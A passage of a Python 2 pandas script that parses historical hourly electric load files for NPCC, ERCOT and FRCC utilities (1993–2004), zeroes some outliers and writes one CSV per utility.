2001 : pd.read_fwf('%s/npcc/2001/MMWE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/npcc/2002/MMWE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/MMWE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2004 : pd.read_fwf('%s/npcc/2004/MMWE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel()
},
13433 : {
1993 : pd.read_fwf('%s/npcc/1993/NEES93' % (fulldir), widths=(8,7), header=None, skipfooter=1)[1].values,
1994 : pd.read_csv('%s/npcc/1994/NEES94' % (fulldir), header=None, skipfooter=1, sep=' ', skipinitialspace=True)[3].values
},
13435 : {
1993 : pd.read_fwf('%s/npcc/1993/NEPOOL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/NEPOOL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/NEPOOL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=3).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/NEPOOL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
1997 : pd.read_fwf('%s/npcc/1997/NEPOOL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/NEPOOL98' % (fulldir), header=None).iloc[:, 5:17].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/NEPOOL99' % (fulldir), engine='python', skiprows=1).iloc[:, 0].values,
2000 : pd.read_fwf('%s/npcc/2000/NEPOOL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/npcc/2001/NEPOOL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/NEPOOL02' % (fulldir), sep='\t').iloc[:, 3:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/NEPOOL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/npcc/2004/NEPOOL04' % (fulldir), sep='\t', header=None, skiprows=10).iloc[:, 5:].values.ravel()
},
13573 : {
1993 : pd.read_csv('%s/npcc/1993/NMPC93' % (fulldir), skiprows=11, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:27].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/NMPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/NMPC96' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
1998 : pd.read_fwf('%s/npcc/1998/NMPC98' % (fulldir), header=None).iloc[:, 2:].astype(int).values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/NMPC99' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
2000 : pd.read_excel('%s/npcc/2000/NMPC00' % (fulldir), sheetname=1, skiprows=10, skipfooter=3).iloc[:, 1:].values.ravel(),
2002 : pd.read_excel('%s/npcc/2002/NMPC02' % (fulldir), sheetname=1, skiprows=2, header=None).iloc[:, 2:].values.ravel(),
2003 : pd.concat([pd.read_excel('%s/npcc/2003/NMPC03' % (fulldir), sheetname=i, skiprows=1, header=None) for i in range(1,13)]).iloc[:, 2:].astype(str).apply(lambda x: x.str[:4]).astype(float).values.ravel()
},
13556 : {
1993 : pd.read_fwf('%s/npcc/1993/NU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_excel('%s/npcc/1994/NU94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1995 : pd.read_excel('%s/npcc/1995/NU95' % (fulldir), header=None, skipfooter=5).dropna(how='any').iloc[:, 3:].values.ravel(),
1996 : pd.read_excel('%s/npcc/1996/NU96' % (fulldir), header=None, skipfooter=1).iloc[:, 5:].values.ravel(),
1997 : pd.read_excel('%s/npcc/1997/NU97' % (fulldir), header=None, skipfooter=4).iloc[:, 5:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/NU98' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NU99' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NU00' % (fulldir), sep='\t', header=None).iloc[:, 5:].values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/NU01' % (fulldir)).iloc[:, -1].values,
2002 : pd.read_excel('%s/npcc/2002/NU02' % (fulldir)).iloc[:, -1].values,
2003 : pd.read_excel('%s/npcc/2003/NU03' % (fulldir), skipfooter=1).iloc[:, -1].values
},
15296 : {
1993 : pd.read_csv('%s/npcc/1993/NYPA93' % (fulldir), engine='python', header=None).values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/NYPA94' % (fulldir), engine='python', header=None).values.ravel(),
1995 : pd.read_csv('%s/npcc/1995/NYPA95' % (fulldir), engine='python', header=None).values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/NYPA96' % (fulldir), engine='python', header=None).values.ravel(),
1997 : pd.read_csv('%s/npcc/1997/NYPA97' % (fulldir), engine='python', header=None).values.ravel(),
1998 : pd.read_csv('%s/npcc/1998/NYPA98' % (fulldir), engine='python', header=None).values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NYPA99' % (fulldir), header=None).values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NYPA00' % (fulldir), engine='python', header=None).values.ravel(),
2001 : pd.read_csv('%s/npcc/2001/NYPA01' % (fulldir), engine='python', header=None).values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/NYPA02' % (fulldir), engine='python', header=None).values.ravel(),
2003 : pd.read_csv('%s/npcc/2003/NYPA03' % (fulldir), engine='python', header=None).values.ravel()
},
13501 : {
1993 : pd.read_fwf('%s/npcc/1993/NYPP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
13511 : {
1996 : pd.read_fwf('%s/npcc/1996/NYS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/NYS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NYS99' % (fulldir)).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NYS00' % (fulldir), sep='\t').iloc[:, -1].values,
2001 : pd.read_csv('%s/npcc/2001/NYS01' % (fulldir), sep='\t', skiprows=3).dropna(how='all').iloc[:, -1].values,
2002 : pd.read_csv('%s/npcc/2002/NYS02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3).iloc[:, 2].values,
2003 : pd.read_csv('%s/npcc/2003/NYS03' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:, -1].values,
2004 : pd.read_csv('%s/npcc/2004/NYS04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).dropna(how='all').iloc[:, -1].values
},
14154 : {
1993 : pd.read_csv('%s/npcc/1993/OR93' % (fulldir), skiprows=5, header=None).iloc[:, 2:26].values.ravel(),
1995 : (pd.read_csv('%s/npcc/1995/OR95' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1996 : (pd.read_csv('%s/npcc/1996/OR96' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1997 : (pd.read_csv('%s/npcc/1997/OR97' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1998 : pd.read_fwf('%s/npcc/1998/OR98' % (fulldir), skiprows=1, header=None).dropna(axis=1, how='all').iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/OR99' % (fulldir), sep='\t', skiprows=1, header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/OR00' % (fulldir), sep='\t').iloc[:, -1].values.astype(int).ravel(),
2002 : pd.read_csv('%s/npcc/2002/OR02' % (fulldir), sep='\t', skiprows=2).iloc[:, -1].dropna().values.astype(int).ravel(),
2003 : pd.read_csv('%s/npcc/2003/OR03' % (fulldir), sep='\t').iloc[:, -1].dropna().values.astype(int).ravel(),
2004 : pd.read_csv('%s/npcc/2004/OR04' % (fulldir), header=None).iloc[:, -1].values.astype(int).ravel()
},
16183 : {
1994 : pd.read_fwf('%s/npcc/1994/RGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/RGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/RGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/RGE02' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
2003 : pd.read_csv('%s/npcc/2003/RGE03' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
2004 : pd.read_csv('%s/npcc/2004/RGE04' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values
},
19497 : {
1993 : pd.read_fwf('%s/npcc/1993/UI93' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1994 : pd.read_fwf('%s/npcc/1994/UI94' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1995 : pd.read_fwf('%s/npcc/1995/UI95' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1996 : pd.read_fwf('%s/npcc/1996/UI96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1997 : pd.read_fwf('%s/npcc/1997/UI97' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1998 : pd.read_excel('%s/npcc/1998/UI98' % (fulldir))['MW'].values,
1999 : pd.read_excel('%s/npcc/1999/UI99' % (fulldir)).loc[:, 'HR1':'HR24'].values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/UI01' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
2002 : pd.read_excel('%s/npcc/2002/UI02' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
2003 : pd.read_excel('%s/npcc/2003/UI03' % (fulldir), sheetname=0, skipfooter=2).ix[:, 'HR1':'HR24'].values.ravel(),
2004 : pd.read_excel('%s/npcc/2004/UI04' % (fulldir), sheetname=0, skipfooter=1).ix[:, 'HR1':'HR24'].values.ravel()
}
}
npcc[4226][1995] = pd.concat([npcc[4226][1995][2].dropna(), npcc[4226][1995][6]]).values.ravel()
npcc[3249][1994][npcc[3249][1994] > 5000] = 0
npcc[3249][1996][npcc[3249][1996] > 5000] = 0
npcc[15296][2000][npcc[15296][2000] > 5000] = 0
npcc[15296][2001][npcc[15296][2001] > 5000] = 0
npcc[4089][1998] = np.repeat(np.nan, len(npcc[4089][1998]))
npcc[13511][1996][npcc[13511][1996] < 500] = 0
npcc[13511][1997][npcc[13511][1997] < 500] = 0
npcc[13511][1999][npcc[13511][1999] < 500] = 0
npcc[13511][2000][npcc[13511][2000] < 500] = 0
npcc[14154][2002][npcc[14154][2002] > 2000] = 0
if not os.path.exists('./npcc'):
os.mkdir('npcc')
for k in npcc.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(npcc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(npcc[k][i]))) for i in npcc[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].replace('.', '0').astype(float).replace(0, np.nan)
s.to_csv('./npcc/%s.csv' % k)
###### ERCOT
# AUST: 1015
# CPL: 3278
# HLP: 8901
# LCRA: 11269
# NTEC: 13670
# PUB: 2409
# SRGT: 40233
# STEC: 17583
# TUEC: 44372
# TMPP: 18715
# TXLA: 18679
# WTU: 20404
ercot = {
1015 : {
1993 : pd.read_fwf('%s/ercot/1993/AUST93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/AUST94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/AUST95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/AUST96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/AUST97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['AENX'].loc[2:].astype(float)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['AENX'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[3].str.replace(',', '').astype(float)/1000).values
},
3278 : {
1993 : pd.read_fwf('%s/ercot/1993/CPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/CPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/CPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/CPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['CPLC'].loc[2:].astype(int)/1000).values
},
8901 : {
1993 : pd.read_fwf('%s/ercot/1993/HLP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/HLP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/HLP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/HLP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/HLP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['HLPC'].loc[2:].astype(int)/1000).values
},
11269: {
1993 : pd.read_fwf('%s/ercot/1993/LCRA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/ercot/1994/LCRA94' % (fulldir), skiprows=4).iloc[:, -1].values,
1995 : pd.read_fwf('%s/ercot/1995/LCRA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/LCRA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/LCR97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['LCRA'].loc[2:].astype(int)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['LCRA'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[6].str.replace(',', '').astype(float)/1000).values
},
13670 : {
1993 : pd.read_csv('%s/ercot/1993/NTEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
1994 : pd.read_fwf('%s/ercot/1994/NTEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/NTEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/NTEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/NTEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/ercot/2001/NTEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
2409 : {
1993 : pd.read_fwf('%s/ercot/1993/PUB93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/PUB94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/PUB95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/PUB96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/PUB97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['PUBX'].loc[2:].astype(int)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['PUBX'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[7].str.replace(',', '').astype(float)/1000).values
},
40233 : {
1993 : pd.read_csv('%s/ercot/1993/SRGT93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1994 : pd.read_fwf('%s/ercot/1994/SRGT94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/SRGT95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/SRGT96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/SRGT97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
17583 : {
1993 : pd.read_fwf('%s/ercot/1993/STEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['STEC'].loc[2:].astype(int)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['STEC'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[9].str.replace(',', '').astype(float)/1000).values
},
44372 : {
1993 : pd.read_fwf('%s/ercot/1993/TUEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/TUEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/TUEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/TUE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/TUE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TUEC'].loc[2:].astype(int)/1000).values
},
18715 : {
1993 : pd.read_csv('%s/ercot/1993/TMPP93' % (fulldir), skiprows=7, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/TMPP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/TMPP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['TMPP'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[10].str.replace(',', '').astype(float)/1000).values
},
18679 : {
1993 : pd.read_csv('%s/ercot/1993/TEXLA93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1995 : pd.read_fwf('%s/ercot/1995/TXLA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/TXLA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/TXLA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TXLA'].loc[2:].astype(int)/1000).values
},
20404 : {
1993 : pd.read_fwf('%s/ercot/1993/WTU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('\s', '0')).astype(float).values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/WTU94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/WTU96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/WTU97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['WTUC'].loc[2:].astype(int)/1000).values
}
}
ercot[2409][1998][ercot[2409][1998] > 300] = 0
ercot[2409][1999][ercot[2409][1999] > 300] = 0
if not os.path.exists('./ercot'):
os.mkdir('ercot')
for k in ercot.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(ercot[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(ercot[k][i]))) for i in ercot[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./ercot/%s.csv' % k)
###### FRCC
# GAIN: 6909
# LAKE: 10623
# FMPA: 6567
# FPC: 6455
# FPL: 6452
# JEA: 9617
# KUA: 10376
# OUC: 14610
# TECO: 18454
# SECI: 21554
frcc = {
6909 : {
1993 : pd.read_fwf('%s/frcc/1993/GAIN93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/frcc/1994/GAIN94' % (fulldir), header=None, sep=' ', skipinitialspace=True, skipfooter=2, skiprows=5).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/GAIN95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/frcc/1996/GAIN96' % (fulldir), sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/GAIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/frcc/1998/GAIN98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3, header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/GAIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/GAIN00' % (fulldir), header=None).iloc[:, 4:].values.ravel(),
2002 : pd.read_excel('%s/frcc/2002/GAIN02' % (fulldir), sheetname=1, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
2003 : pd.read_excel('%s/frcc/2003/GAIN03' % (fulldir), sheetname=2, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
2004 : pd.read_excel('%s/frcc/2004/GAIN04' % (fulldir), sheetname=0, header=None).iloc[:, 8:].values.ravel()
},
10623: {
1993 : pd.read_fwf('%s/frcc/1993/LAKE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/LAKE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/LAKE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/LAKE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/LAKE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/frcc/1998/LAKE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/LAKE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/LAKE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/frcc/2001/LAKE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/frcc/2002/LAKE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
6567 : {
1993 : pd.read_fwf('%s/frcc/1993/FMPA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
